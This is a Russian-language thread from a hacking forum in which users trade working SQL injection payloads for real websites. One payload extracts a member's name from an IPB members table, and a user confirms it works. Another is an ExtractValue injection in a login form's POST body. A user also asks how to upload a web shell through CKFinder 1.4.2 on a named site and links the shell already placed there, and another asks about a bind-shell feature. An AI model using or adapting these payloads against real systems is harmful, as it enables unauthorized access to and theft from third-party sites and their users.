ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.10.2015, 23:55
|
|
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264
Репутация:
69
|
|
Сообщение от ButilkaSoka
ButilkaSoka said:
↑
/news'and(select!x-~0.FROM(select+(select concat(0x3c62723e,name,0x3c62723e) from ipb_members where member_id='15664')x)f)and'/
через браузер. через burp suite запрос прерывается там же
|
|
|
20.10.2015, 00:00
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Код:
Code:
/news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c62723e))from(ipb_members)where(member_id='15664'))x)f)and'/
|
|
|
|
20.10.2015, 00:05
|
|
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264
Репутация:
69
|
|
Сообщение от yarbabin
yarbabin said:
↑
/news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c6 2723e))from(ipb_members)where(member_id='15664'))x )f)and'/ спасибо, все работает
|
|
|
|
20.10.2015, 10:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от SaNDER
SaNDER said:
↑
_ttp://vulkan.site/.htaccess
Код:
Code:
RewriteEngine On
RewriteRule ^go/([p0-9]*)/([a-zA-Z0-9]+)/?$ /go.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^go/([p0-9]*)/?$ /go.php?pid=$1 [QSA,L]
RewriteRule ^imp/([p0-9]*)/([a-zA-Z0-9]+)/?$ /imp.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^imp/([p0-9]*)/?$ /imp.php?pid=$1 [QSA,L]
RewriteRule ^events/([A-Za-z]+)/?$ /eventapi/api.php?action=$1 [QSA,L]
RewriteRule ^[A-Za-z0-9]+/(p[0-9]+)/([a-zA-Z0-9]+)/?$ /index.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^[A-Za-z0-9]+/(p[0-9]+)/?$ /index.php?pid=$1 [QSA,L]
RewriteRule ^(p[0-9]*)/([a-zA-Z0-9]+)/?$ /index.php?pid=$1&tid=$2 [QSA]
RewriteRule ^(p[0-9]*)/?$ /index.php?pid=$1 [QSA]
Можно что-нибудь сделать? можно узнать, как настроен rewriterule. а что вы хотите?
|
|
|
|
20.10.2015, 21:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
11341
Репутация:
0
|
|
|
|
|
|
20.10.2015, 21:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="authorize"\r\n
\r\n
1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="login"\r\n
\r\n
admin'or(ExtractValue(1,concat(0x3a,(select(versio n())))))='1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
sdsdgsg\r\n
-----------------------------219001973211145--\r\n
зачем sqlmap здесь?
|
|
|
|
21.10.2015, 00:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
11341
Репутация:
0
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="authorize"\r\n
\r\n
1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="login"\r\n
\r\n
admin'or(ExtractValue(1,concat(0x3a,(select(versio n())))))='1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
sdsdgsg\r\n
-----------------------------219001973211145--\r\n
зачем sqlmap здесь? руками не дорос еще крутить
|
|
|
|
21.10.2015, 00:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
|
|
|
|
21.10.2015, 11:31
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
помогите пожалуйста здесь в ckfinder'e 1.4.2 можно как нибудь шел залить?
Как только не пробывал и через форму отдельную к connector'y и так
Получается так; _php;.txt
загруженный шел;
.SpoilerTarget" type="button">Spoiler: shell
aromagiya.kz/cms/uploads/files/Sh3LL_php;.txt
ckfinder:
.SpoilerTarget" type="button">Spoiler: ckfinder
aromagiya.kz/cms/files/appends/ckfinder/ckfinder.html
|
|
|
|
21.10.2015, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
19071
Репутация:
10
|
|
Для чего в шеллах есть пункт "Bind port to /bin/sh [perl]", и порт указан 31337 ?
Как и когда это использовать, объясните если не трудно
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
